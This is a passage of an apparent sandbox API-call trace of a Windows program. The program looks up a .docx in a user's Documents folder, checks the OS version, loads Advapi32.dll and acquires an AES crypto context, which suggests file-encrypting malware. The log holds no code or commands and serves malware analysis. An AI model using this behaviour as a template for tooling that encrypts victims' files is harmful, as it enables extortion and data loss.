Flags=0x0, Size=0x20) returned 0x2a77b20 [0215.140] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0215.140] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0215.140] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0215.140] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0215.140] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0215.140] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0215.140] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0215.140] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0215.140] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0215.140] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0215.140] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0215.140] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0215.140] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae40 | out: hHeap=0x2af0000) returned 1 [0215.140] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.140] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0215.140] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0215.140] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae40 | out: hHeap=0x2af0000) returned 1 [0215.140] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0215.140] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0215.140] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0215.140] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b88 [0215.141] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0215.141] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0215.141] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0215.141] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0215.141] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0215.141] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0215.141] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab350 [0215.141] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0215.141] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae40 | out: hHeap=0x2af0000) returned 1 [0215.141] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0215.141] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0215.141] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0215.141] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0215.141] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0215.141] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/4pPJKhvtklZXxwQ0M09.docx", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x165c4830, ftCreationTime.dwHighDateTime=0x1d5c226, ftLastAccessTime.dwLowDateTime=0xd2602fe0, ftLastAccessTime.dwHighDateTime=0x1d552f2, ftLastWriteTime.dwLowDateTime=0xd2602fe0, ftLastWriteTime.dwHighDateTime=0x1d552f2, nFileSizeHigh=0x0, nFileSizeLow=0x67d6, dwReserved0=0x0, dwReserved1=0x0, cFileName="4pPJKhvtklZXxwQ0M09.docx", cAlternateFileName="4PPJKH~1.DOC")) returned 0x9e2138 [0215.141] FindClose (in: hFindFile=0x9e2138 | out: hFindFile=0x9e2138) returned 1 [0215.142] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0215.142] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0215.142] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae40 | out: hHeap=0x2af0000) returned 1 [0215.142] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0215.142] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0215.142] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0215.142] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab350 | out: hHeap=0x2af0000) returned 1 [0215.142] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ee0 | out: hHeap=0x2af0000) returned 1 [0215.142] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0215.142] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.142] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0215.142] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b88 [0215.143] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0215.143] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0215.143] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0215.143] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0215.143] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0215.143] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0215.143] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab350 [0215.143] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0215.143] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab350 | out: hHeap=0x2af0000) returned 1 [0215.143] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0215.143] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab350 [0215.143] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0215.143] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0215.143] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0215.143] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0215.143] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0215.143] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0215.143] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0215.143] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0215.143] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0215.143] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0215.143] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0215.143] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0215.143] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0215.143] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.144] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0215.144] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0215.144] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0215.144] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.144] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0215.144] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0215.144] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0215.144] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0215.144] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0215.144] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0215.144] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0215.144] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0215.144] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0215.144] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.144] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ecc0 | out: hHeap=0x2af0000) returned 1 [0215.144] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.144] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0215.144] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0215.144] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0215.144] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0215.144] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0215.144] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0215.144] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0215.144] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0215.144] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0215.144] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0215.144] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0215.144] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0215.144] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0215.145] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0215.145] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0215.145] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0215.145] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0215.145] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0215.145] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0215.145] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0215.145] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0215.145] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0215.145] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0215.145] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0215.145] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0215.145] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0215.145] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0215.145] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0215.145] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70e0 | out: hHeap=0x2af0000) returned 1 [0215.145] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0215.145] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0215.145] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.145] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0215.145] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0215.145] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0215.145] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0215.145] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0215.146] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0215.146] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0215.146] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0215.146] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0215.146] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0215.146] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0215.146] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0215.146] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0215.146] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0215.146] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.146] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0215.146] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.146] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0215.146] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0215.146] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0215.146] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0215.146] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0215.146] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0215.146] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0215.146] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0215.146] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d28 | out: hHeap=0x2af0000) returned 1 [0215.146] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0215.146] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7e8 | out: hHeap=0x2af0000) returned 1 [0215.146] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7a0 | out: hHeap=0x2af0000) returned 1 [0215.146] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9c8 | out: hHeap=0x2af0000) returned 1 [0215.146] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0215.147] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0215.147] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0215.147] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0215.147] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0215.147] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0215.147] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab788 | out: hHeap=0x2af0000) returned 1 [0215.147] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7d0 | out: hHeap=0x2af0000) returned 1 [0215.147] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0215.147] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0215.147] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.147] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.147] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.147] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0215.147] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0215.147] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.147] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0215.147] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0215.147] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0215.147] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0215.147] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0215.147] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0215.147] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0215.147] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f6f60, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0215.148] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0215.148] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f71e0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0215.148] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa7bc48) returned 1 [0215.149] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.149] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.149] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0215.149] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0215.149] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0215.149] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0215.149] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0215.149] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0215.149] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.149] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.149] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.149] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0215.149] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0215.149] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0215.149] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0215.149] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0215.150] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0215.150] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0215.150] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0215.150] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0215.150] CharUpperBuffW (in: 